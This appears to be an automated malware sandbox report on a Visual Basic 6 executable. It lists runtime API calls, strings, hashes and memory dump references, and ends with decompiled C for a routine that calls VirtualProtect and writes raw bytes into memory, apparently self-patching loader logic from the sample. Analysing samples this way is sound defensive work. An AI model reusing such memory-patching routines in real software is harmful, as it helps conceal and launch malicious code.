__vbaNew2.MSVBVM60(004095DC,0046C7C0), ref: 0046541C
__vbaHresultCheckObj.MSVBVM60(00000000,029E254C,004095CC,00000020), ref: 00465444
__vbaLateIdCallLd.MSVBVM60(?,?,00010018,00000000), ref: 0046545E
__vbaI2Var.MSVBVM60(00000000), ref: 00465468
__vbaFreeObj.MSVBVM60 ref: 00465483
__vbaFreeVar.MSVBVM60 ref: 0046548F
__vbaObjSet.MSVBVM60(?,00000000), ref: 004654B2
__vbaNew2.MSVBVM60(004095DC,0046C7C0), ref: 004654F6
__vbaHresultCheckObj.MSVBVM60(00000000,029E254C,004095CC,00000020), ref: 0046551E
__vbaLateIdCallLd.MSVBVM60(?,?,00010019,00000001), ref: 00465591
__vbaStrVarMove.MSVBVM60(00000000), ref: 0046559B
__vbaStrMove.MSVBVM60 ref: 004655A6
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000001EC), ref: 004655D8
__vbaFreeStr.MSVBVM60 ref: 004655E1
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 004655F7
__vbaFreeVar.MSVBVM60 ref: 00465606
__vbaObjSet.MSVBVM60(?,00000000), ref: 0046562F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F4), ref: 00465654
__vbaFreeObj.MSVBVM60 ref: 00465660
__vbaObjSet.MSVBVM60(?,00000000), ref: 0046568C
__vbaStrI4.MSVBVM60(00000002), ref: 004656CD
__vbaStrMove.MSVBVM60 ref: 004656D8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000001EC), ref: 00465700
__vbaFreeStr.MSVBVM60 ref: 00465709
__vbaFreeObj.MSVBVM60 ref: 00465715
__vbaObjSet.MSVBVM60(?,00000000), ref: 0046572C
__vbaStrI4.MSVBVM60(00000002), ref: 00465774
__vbaStrMove.MSVBVM60 ref: 0046577F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000001EC), ref: 004657A5
__vbaFreeStr.MSVBVM60 ref: 004657AE
__vbaFreeObj.MSVBVM60 ref: 004657BA
__vbaObjSet.MSVBVM60(?,00000000), ref: 004657E5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F4), ref: 0046580A
__vbaFreeObj.MSVBVM60 ref: 00465816
__vbaObjSet.MSVBVM60(?,00000000), ref: 0046582D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F4), ref: 00465852
__vbaFreeObj.MSVBVM60 ref: 0046585E
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 004658BA
__vbaObjSet.MSVBVM60(?,00000000), ref: 004658D4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000001EC), ref: 0046593E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000001EC), ref: 004659A8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000001EC), ref: 00465A12
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000001EC), ref: 00465A7C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000001EC), ref: 00465AE6
__vbaI4Str.MSVBVM60(&H40), ref: 00465AF7
__vbaI4Str.MSVBVM60(&H1000,00000000), ref: 00465AFF
__vbaSetSystemError.MSVBVM60(00000000,00000D50,00000000), ref: 00465B14
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000001EC), ref: 00465B8A
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000001EC), ref: 00465BF4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000001EC), ref: 00465C5E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000001EC), ref: 00465CCE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000000F4), ref: 00465D01
__vbaObjSetAddref.MSVBVM60(?,00000000), ref: 00465D0B
__vbaSetSystemError.MSVBVM60(02CB0000,00000000,00000D50,?), ref: 00465D4A
__vbaFreeVar.MSVBVM60 ref: 00465D56
_adj_fdiv_m64.MSVBVM60 ref: 00465D7F
__vbaHresultCheckObj.MSVBVM60(00000000,00401C68,00409BB0,00000708), ref: 00465DE4
__vbaVarMove.MSVBVM60 ref: 00465E09
_adj_fdiv_m64.MSVBVM60 ref: 00465E2E
__vbaVarMove.MSVBVM60 ref: 00465E56
__vbaNew2.MSVBVM60(004095DC,0046C7C0), ref: 00465E6A
__vbaHresultCheckObj.MSVBVM60(00000000,029E254C,004095CC,00000038,?,?,?,?,?,?,?,00000003), ref: 00465F05
__vbaNew2.MSVBVM60(004095DC,0046C7C0,?,?,?,?,?,?,?,00000003), ref: 00465F1D
__vbaHresultCheckObj.MSVBVM60(00000000,029E254C,004095CC,00000048,?,?,?,?,?,?,?,00000003), ref: 00465F47
__vbaNew2.MSVBVM60(004095DC,0046C7C0,?,?,?,?,?,?,?,00000003), ref: 00465F5F
__vbaHresultCheckObj.MSVBVM60(00000000,029E254C,004095CC,00000038,?,?,?,?,?,?,?,?), ref: 00465FFC
__vbaVar2Vec.MSVBVM60(?,00000003,?,?,?,?,?,?,?,?), ref: 00466010
__vbaRefVarAry.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 0046601D
__vbaUbound.MSVBVM60(00000001,?,?,?,?,?,?,?,?,?), ref: 00466028
__vbaErase.MSVBVM60(00000000,?,?,00007149,00000000,?,?,?,?,?,?,?,?,?), ref: 0046604A
__vbaAryMove.MSVBVM60(pU],42BA0000,?,?,?,?,?,?,?,?,?), ref: 00466062
__vbaFreeVarList.MSVBVM60(00000003,00000008,?,00000003,?,?,?,?,?,?,?,?,?), ref: 0046607F
_adj_fdiv_m64.MSVBVM60(?,?,?,?,?,?,?,?,?), ref: 004660A8
_adj_fdiv_m64.MSVBVM60(00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0046611E
__vbaVarSub.MSVBVM60(00000003,00401CA0,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0046613E
__vbaVarPow.MSVBVM60(00000008,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0046614F
__vbaVarSub.MSVBVM60(?,00401CB0,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00466168
__vbaVarPow.MSVBVM60(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00466179
__vbaVarAdd.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00466187
__vbaR8Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0046618E
#614.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0046619A
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004661A9
_adj_fdiv_m64.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004661D2

Part of subcall function 00460110: __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 00460195
Part of subcall function 00460110: __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?), ref: 004601E0
Part of subcall function 00460110: __vbaVarTstEq.MSVBVM60(?,?,00001BBC), ref: 0046023C
Part of subcall function 00460110: __vbaVarTstEq.MSVBVM60(00008002,?), ref: 0046025D

__vbaVarSub.MSVBVM60(00000003,00401CA0,00000008), ref: 00466214
__vbaVarPow.MSVBVM60(00000008,?,00000000), ref: 00466225
__vbaR8Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0046622C
#614.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00466238
_adj_fdiv_m64.MSVBVM60(02CB0000,?,?), ref: 004662AE
_adj_fdiv_m64.MSVBVM60(02CB0000,?,?), ref: 00466303
__vbaVarCmpEq.MSVBVM60(?,?,00401CB0,02CB0000,?,?), ref: 0046631E
__vbaVarCmpLt.MSVBVM60(00000008,?,00401CA0,00000000,?,?,00401CB0,02CB0000,?,?), ref: 00466337
__vbaVarAnd.MSVBVM60(?,00000000,?,?,00401CB0,02CB0000,?,?), ref: 00466345
__vbaBoolVarNull.MSVBVM60(00000000,?,?,00401CB0,02CB0000,?,?), ref: 0046634C
_adj_fdiv_m64.MSVBVM60(02CB0000,?,?), ref: 004663A1
__vbaVarTstGt.MSVBVM60(00008005,00401CB0,02CB0000,?,?), ref: 004663CB
__vbaFreeVarList.MSVBVM60(00000002,00000003,00000008,00460410,00000000,00000003,00000008), ref: 0046652B
__vbaVarForInit.MSVBVM60(?,?,?,?,?,00000005,pU]), ref: 004665A2
__vbaVarAdd.MSVBVM60(00000003,00000002,?), ref: 004665DE
__vbaI4Var.MSVBVM60(00000000), ref: 004665E5
__vbaI4Var.MSVBVM60(?), ref: 00466600
__vbaFreeVar.MSVBVM60 ref: 00466617
__vbaVarForNext.MSVBVM60(?,?,?), ref: 00466635
__vbaUbound.MSVBVM60(00000001,005D5570), ref: 0046664B
__vbaVarForInit.MSVBVM60(?,?,?,?,?,00000002), ref: 0046669F
__vbaI4Var.MSVBVM60(?), ref: 004666AD
__vbaI4Var.MSVBVM60(?), ref: 004666D0
__vbaVarForNext.MSVBVM60(?,?,?), ref: 004666FB
__vbaAryLock.MSVBVM60(?,005D5570), ref: 00466710
__vbaAryLock.MSVBVM60(?,005D5570), ref: 0046671D
__vbaUbound.MSVBVM60(00000001,005D5570), ref: 0046672D
__vbaSetSystemError.MSVBVM60(?,?,-00000001), ref: 0046675A
__vbaAryUnlock.MSVBVM60(?,?,-00000001), ref: 0046676A
__vbaAryUnlock.MSVBVM60(?,?,-00000001), ref: 00466770
__vbaUbound.MSVBVM60(00000001,005D5570,00000000,?,-00000001), ref: 0046677D
__vbaRedimPreserve.MSVBVM60(00000080,00000001,pU],00000011,00000001,00000000,?,-00000001), ref: 0046679D
_adj_fdiv_m64.MSVBVM60(pU]), ref: 004667D3
__vbaVarCmpGt.MSVBVM60(00000003,00000002,00401CA0,pU]), ref: 00466846
__vbaVarCmpGt.MSVBVM60(00000008,00000003,00401CB0,00000000), ref: 0046685C
__vbaVarAnd.MSVBVM60(?,00000000), ref: 0046686A
__vbaBoolVarNull.MSVBVM60(00000000), ref: 00466871
__vbaVarCmpLt.MSVBVM60(00000003,00000002,00401CA0), ref: 0046691A
__vbaVarCmpLt.MSVBVM60(00000008,00000003,00401CB0,00000000), ref: 00466930
__vbaVarAnd.MSVBVM60(?,00000000), ref: 0046693E
__vbaBoolVarNull.MSVBVM60(00000000), ref: 00466945
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466A51
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409314,000000F0,?,00000002,00401CA0), ref: 00466A7D
__vbaFreeObj.MSVBVM60(?,00000002,00401CA0), ref: 00466A99
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466B12
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466B25
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A714,000000A0,?,00000002,00401CA0), ref: 00466B52
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466B65
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000108,?,00000002,00401CA0), ref: 00466B95
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466BA8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040937C,00000110,?,00000002,00401CA0), ref: 00466BD8
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466BEB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A724,000000E0,?,00000002,00401CA0), ref: 00466C1B
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466C2E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A724,000000E0,?,00000002,00401CA0), ref: 00466C5E
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466C71
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040A724,000000E0,?,00000002,00401CA0), ref: 00466CA1
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466CB4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000000F0,?,00000002,00401CA0), ref: 00466CE4
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466CF7
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000000F8,?,00000002,00401CA0), ref: 00466D2B
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466D3E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000000F0,?,00000002,00401CA0), ref: 00466D6E
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466D81
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000000F8,?,00000002,00401CA0), ref: 00466DB5
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466DC8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000000F0,?,00000002,00401CA0), ref: 00466DF8
__vbaObjSet.MSVBVM60(?,00000000,?,00000002,00401CA0), ref: 00466E0B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409314,000000F8,?,00000002,00401CA0), ref: 00466E42
__vbaStrMove.MSVBVM60(?,00000002,00401CA0), ref: 00466E5A
__vbaI2Str.MSVBVM60(?,?,00000002,00401CA0), ref: 00466E6A
__vbaI2Str.MSVBVM60(?,?,00000002,00401CA0), ref: 00466E76
_adj_fdiv_m32.MSVBVM60(?,00000002,00401CA0), ref: 00466E95
__vbaFpI4.MSVBVM60(?,00000002,00401CA0), ref: 00466EEC
_adj_fdiv_m32.MSVBVM60(?,00000002,00401CA0), ref: 00466F0B
__vbaFpI4.MSVBVM60(?,00000002,00401CA0), ref: 00466F20
__vbaObjSet.MSVBVM60(?,?,?,00000002,00401CA0), ref: 00466F54
__vbaFpI2.MSVBVM60(?,?,?,00000002,00401CA0), ref: 00466F67
__vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000002,00401CA0), ref: 00466FC5
__vbaFreeObjList.MSVBVM60(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0046702F
__vbaFreeVar.MSVBVM60 ref: 0046703E
__vbaFreeObj.MSVBVM60(00467193), ref: 00467137
__vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 0046715B
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00467173
__vbaAryDestruct.MSVBVM60(00000000,42BA0000), ref: 00467187
__vbaFreeVar.MSVBVM60 ref: 0046718C

Strings

&H1000, xrefs: 00465AFA
OpenGL, xrefs: 00465EAC
pU], xrefs: 0046605D, 00466534, 0046653E, 004665E9, 00466642, 004666B1, 004666D2, 004666FF, 00466712, 0046671F, 00466772, 00466791, 004667A6
Heavy, xrefs: 0046590E
Thin, xrefs: 00465C98
Normal, xrefs: 00465B5A
&H40, xrefs: 00465AF2
Light, xrefs: 00465BC4
], xrefs: 00465DF5
Semibold, xrefs: 00465A4C
Extrabold, xrefs: 00465978
Bold, xrefs: 004659E2
Extralight, xrefs: 00465C2E
Medium, xrefs: 00465AB6

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$Free$List_adj_fdiv_m64$Move$New2$Ubound$BoolErrorNullSystem$#614CallDestructInitLateLockNextUnlock_adj_fdiv_m32$AddrefConstruct2ErasePreserveRedimVar2
String ID: &H1000$&H40$Bold$Extrabold$Extralight$Heavy$Light$Medium$Normal$OpenGL$Semibold$Thin$]$pU]
API String ID: 3633728834-2250691434
Opcode ID: 87f977b8f5df57ec8daf58c99d7b2047d3fc3f3f4cc006887873716b82086482
Instruction ID: be1305acdde03b4cbe839e1387e43f9087e6ee71d052470b0abfa718f5bae01e
Opcode Fuzzy Hash: 87f977b8f5df57ec8daf58c99d7b2047d3fc3f3f4cc006887873716b82086482
Instruction Fuzzy Hash: B6133FB0900219DFDB14DF64DD88BEAB7B8FF48304F0081EAE549A72A1DB745A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0045FAD0, Relevance: 110.6, APIs: 59, Strings: 4, Instructions: 337
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__vbaDateR8.MSVBVM60(00000000,40370000), ref: 0045FB43
#537.MSVBVM60(00000035), ref: 0045FB4E
__vbaStrMove.MSVBVM60 ref: 0045FB5F
__vbaI4Str.MSVBVM60(&h40,?), ref: 0045FB79
__vbaStrMove.MSVBVM60(00000000), ref: 0045FB85
__vbaI4Str.MSVBVM60(00000000), ref: 0045FB88
VirtualProtect.KERNELBASE(?,00000000), ref: 0045FB98
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0045FBA8
#553.MSVBVM60(?,?), ref: 0045FBCF
__vbaI2Var.MSVBVM60(?), ref: 0045FBDF
__vbaFreeVar.MSVBVM60 ref: 0045FBE7
#545.MSVBVM60(?,00004007), ref: 0045FC0B
__vbaI2Var.MSVBVM60(?), ref: 0045FC15
__vbaFreeVar.MSVBVM60 ref: 0045FC1D
#542.MSVBVM60(?,00004007), ref: 0045FC41
__vbaI2Var.MSVBVM60(?), ref: 0045FC4B
__vbaFreeVar.MSVBVM60 ref: 0045FC53
#610.MSVBVM60(?), ref: 0045FC5D
#553.MSVBVM60(?,?), ref: 0045FC6E
__vbaVarSub.MSVBVM60(?,00004007,?), ref: 0045FC9E
__vbaI2Var.MSVBVM60(00000000), ref: 0045FCA5
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0045FCB7
#610.MSVBVM60(?), ref: 0045FCC4
#545.MSVBVM60(?,?), ref: 0045FCD5
__vbaVarSub.MSVBVM60(?,00000002,?), ref: 0045FD05
__vbaI2Var.MSVBVM60(00000000), ref: 0045FD0C
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0045FD1E
#610.MSVBVM60(?), ref: 0045FD2B
#542.MSVBVM60(?,?), ref: 0045FD3C
__vbaVarSub.MSVBVM60(?,00000002,?), ref: 0045FD6C
__vbaI2Var.MSVBVM60(00000000), ref: 0045FD73
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0045FD84
__vbaSetSystemError.MSVBVM60(?,?,00000001), ref: 0045FDA9
__vbaI2Sgn.MSVBVM60 ref: 0045FDB1
__vbaSetSystemError.MSVBVM60(?,?,00000004), ref: 0045FDF4
__vbaI2Sgn.MSVBVM60 ref: 0045FDFD
__vbaStrI2.MSVBVM60(?), ref: 0045FE27
__vbaStrMove.MSVBVM60 ref: 0045FE32
__vbaStrCat.MSVBVM60( year(s) ,00000000), ref: 0045FE3A
__vbaStrMove.MSVBVM60 ref: 0045FE45
__vbaStrI2.MSVBVM60(?,00000000), ref: 0045FE4C
__vbaStrMove.MSVBVM60 ref: 0045FE57
__vbaStrCat.MSVBVM60(00000000), ref: 0045FE5A
__vbaStrMove.MSVBVM60 ref: 0045FE65
__vbaStrCat.MSVBVM60( month(s) ,00000000), ref: 0045FE6D
__vbaStrMove.MSVBVM60 ref: 0045FE78
__vbaStrI2.MSVBVM60(00000000,00000000), ref: 0045FE7C
__vbaStrMove.MSVBVM60 ref: 0045FE87
__vbaStrCat.MSVBVM60(00000000), ref: 0045FE90
__vbaStrMove.MSVBVM60 ref: 0045FE97
__vbaStrCat.MSVBVM60( day(s) old.,00000000), ref: 0045FE9F
__vbaStrMove.MSVBVM60 ref: 0045FEA6
__vbaFreeStrList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 0045FEC6
#557.MSVBVM60(?), ref: 0045FEDD
__vbaFreeVar.MSVBVM60 ref: 0045FEF1
#546.MSVBVM60(00000002), ref: 0045FF18
__vbaVarTstGt.MSVBVM60(00000002,00008007), ref: 0045FF29
__vbaFreeVar.MSVBVM60 ref: 0045FF32
__vbaFreeStr.MSVBVM60(0045FF88), ref: 0045FF81

Strings

year(s) , xrefs: 0045FE35
&h40, xrefs: 0045FB6B
day(s) old., xrefs: 0045FE9A
month(s) , xrefs: 0045FE68

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$Move$List$#610$#542#545#553ErrorSystem$#537#546#557DateProtectVirtual
String ID: day(s) old.$ month(s) $ year(s) $&h40
API String ID: 3046449673-2467835927
Opcode ID: 35f0d6e770682d602cceac61d86a5f5138fad055d88d93997a63f62fa9d48aed
Instruction ID: fee8394c8502ccbe5dbb38106309f2a7f9172c82f590b6794d186d917a907492
Opcode Fuzzy Hash: 35f0d6e770682d602cceac61d86a5f5138fad055d88d93997a63f62fa9d48aed
Instruction Fuzzy Hash: EDD139B190021D9FDB14DFA4CD88AEEBBB8FF48304F10816AE549B7260DB745A89CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004640D0, Relevance: 36.2, APIs: 24, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00463F60: __vbaStrCopy.MSVBVM60 ref: 00463F9E
Part of subcall function 00463F60: #608.MSVBVM60(?), ref: 00463FD0
Part of subcall function 00463F60: __vbaVarCat.MSVBVM60(?,?,00000008), ref: 00463FE2
Part of subcall function 00463F60: __vbaStrVarMove.MSVBVM60(00000000), ref: 00463FE9
Part of subcall function 00463F60: __vbaStrMove.MSVBVM60 ref: 00463FF6
Part of subcall function 00463F60: __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00464002

__vbaUbound.MSVBVM60(00000001,00000000), ref: 0046413E
#632.MSVBVM60(?,00004008,?,?), ref: 004641A2
__vbaStrVarVal.MSVBVM60(?,?), ref: 004641B0
#516.MSVBVM60(00000000), ref: 004641B7
__vbaFreeStr.MSVBVM60 ref: 004641C3
__vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 004641D3
#608.MSVBVM60(00000002,?), ref: 0046420C
__vbaInStrVar.MSVBVM60(?,00000000,00000002,00000008,00000001), ref: 00464225
__vbaI2Var.MSVBVM60(00000000), ref: 0046422C
__vbaFreeVarList.MSVBVM60(00000002,00000002,?), ref: 0046423E
#632.MSVBVM60(?,00000008,?,00000002), ref: 00464285
__vbaStrVarMove.MSVBVM60(?,?,00000002), ref: 0046428F
__vbaStrMove.MSVBVM60(?,00000002), ref: 0046429A
__vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,00000002), ref: 004642AA
#617.MSVBVM60(00000002,00004008), ref: 004642D5
#608.MSVBVM60(?,?), ref: 004642E0
#632.MSVBVM60(?,?,?,?), ref: 00464332
__vbaVarCat.MSVBVM60(?,?,00000002,?,?), ref: 0046434A
__vbaVarCat.MSVBVM60(?,00000008,00000000,?,?), ref: 00464358
__vbaVarCat.MSVBVM60(?,?,00000000,?,?), ref: 00464369
__vbaStrVarMove.MSVBVM60(00000000,?,?), ref: 0046436C
__vbaStrMove.MSVBVM60(?,?), ref: 00464379
__vbaFreeVarList.MSVBVM60(00000007,00000002,?,?,0000000A,?,?,?,?,?), ref: 004643A3
__vbaFreeStr.MSVBVM60(00464407), ref: 00464400

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$Move$List$#608#632$#516#617CopyUbound
String ID:
API String ID: 3091196810-0
Opcode ID: c5601355d68d5518d8a736b9a5379cf054f37d37d3f4fa8f35ba831bbb605dc1
Instruction ID: 5297e89369b897e3e088dba8135649d9f178a2b92a6f64ec67eab3cc5c27099c
Opcode Fuzzy Hash: c5601355d68d5518d8a736b9a5379cf054f37d37d3f4fa8f35ba831bbb605dc1
Instruction Fuzzy Hash: 619117B1D00219EFDB14DF94DD88FEEBBB8EB88300F00819AE555A7250EB745A49CF65

Uniqueness

Uniqueness Score: -1.00%

Function 00460110, Relevance: 18.2, APIs: 12, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E00460110(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v28;
				char _v32;
				char _v36;
				char _v52;
				char _v60;
				char _v72;
				intOrPtr _v80;
				intOrPtr _v92;
				char _v100;
				intOrPtr _v108;
				char _v116;
				intOrPtr _v124;
				char _v132;
				char _v152;
				char _v156;
				intOrPtr _v176;
				void* _t74;
				intOrPtr _t77;
				void* _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t87;
				intOrPtr _t88;
				char _t89;
				char* _t90;
				char _t91;
				void* _t94;
				char _t95;
				char* _t100;
				void* _t106;
				intOrPtr _t119;
				char _t131;
				intOrPtr* _t132;
				void* _t136;
				void* _t139;
				void* _t141;
				void* _t143;
				intOrPtr _t144;
				void* _t156;

				_t156 = __fp0;
				_t144 = _t143 - 8;
				 *[fs:0x0] = _t144;
				_v12 = _t144 - 0x9c;
				_v8 = 0x401a58;
				_t131 = 0;
				_v32 = 0;
				_v36 = 0;
				_v52 = 0;
				_v60 = 0;
				_v132 = 0;
				_v152 = 0;
				_v156 = 0;
				_v92 = E00461110;
				_v100 = 3;
				_v108 = 0x4604e0;
				_v116 = 3;
				_t74 = E00461200( &_v116,  &_v116);
				_t136 = _a4 - _t74 + E00461200(_t74,  &_v100);
				__imp____vbaFreeVarList(2,  &_v100,  &_v116, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t141);
				_v92 = 0x461120;
				_v100 = 3;
				_v108 = E00461110;
				_v116 = 3;
				_t77 = E00461200( &_v100,  &_v116);
				_t78 = E00461200(_t77,  &_v100);
				_v176 = _t77;
				_t106 = _t78 - _v176;
				__imp____vbaFreeVarList(2,  &_v100,  &_v116);
				_t80 = 0;
				_v80 = 0;
				while(_t80 <= 0xd) {
					_t88 = _t80;
					if(_t88 == 0) {
						_t131 = 0x1bbc;
						_v60 = 0xc;
					} else {
						if(_t88 == 1) {
							_t131 = 0x1c20;
							_v60 = 1;
						}
					}
					_t89 = E00464040(_t106, _t131, _t136, _t131); // executed
					_v28 = _t89;
					_t90 =  &_v52;
					_v124 = 0;
					_v132 = 0x8002;
					__imp____vbaVarTstEq( &_v132, _t90);
					if(_t90 == 0) {
						_t100 =  &_v132;
						_v124 = 1;
						_v132 = 0x8002;
						__imp____vbaVarTstEq(_t100,  &_v52);
						if(_t100 == 0) {
							_v124 = 2;
							_v132 = 0x8002;
							__imp____vbaVarTstGe( &_v132,  &_v52);
						}
					}
					_t91 = _v28;
					E00409258();
					_v156 = _t91;
					__imp____vbaSetSystemError(_t91);
					_v72 = _v156;
					while(_v60 != 0) {
						_t131 = _t131 + 1;
						_t94 = E00464040(_t106, _t131, _t136, _t131); // executed
						_t95 = E004603D0(_t94, _t94);
						E00408F5C();
						_v156 = _t95;
						__imp____vbaSetSystemError(_v72, _t95);
						E0045FAD0(_t106, _t131, _t136, _t156, _t136, _v156); // executed
						_t136 = _t136 + _t106;
						_v60 = _v60 - 1;
					}
					_t119 = _v80 + 1;
					_v80 = _t119;
					_t80 = _t119;
				}
				_v92 = 0x461100;
				_v100 = 3;
				_v108 = 0x4604e0;
				_v116 = 3;
				_t82 = E00461200(3,  &_v116);
				_t139 = _a4 - _t82 + E00461200(_t82,  &_v100);
				__imp____vbaFreeVarList(2,  &_v100,  &_v116);
				_v156 = 0xff505958;
				E00409178();
				_t132 = __imp____vbaSetSystemError;
				 *_t132(_t139,  &_v156, 4);
				_v152 = 0xe1;
				E00409178();
				_t87 =  *_t132(_t139 + 4,  &_v152, 1);
				__imp____vbaFreeStr(0x4603aa);
				__imp____vbaFreeVar();
				return _t87;
			}

0x00460110
0x00460113
0x00460122
0x00460132
0x00460135
0x0046013f
0x00460147
0x0046014a
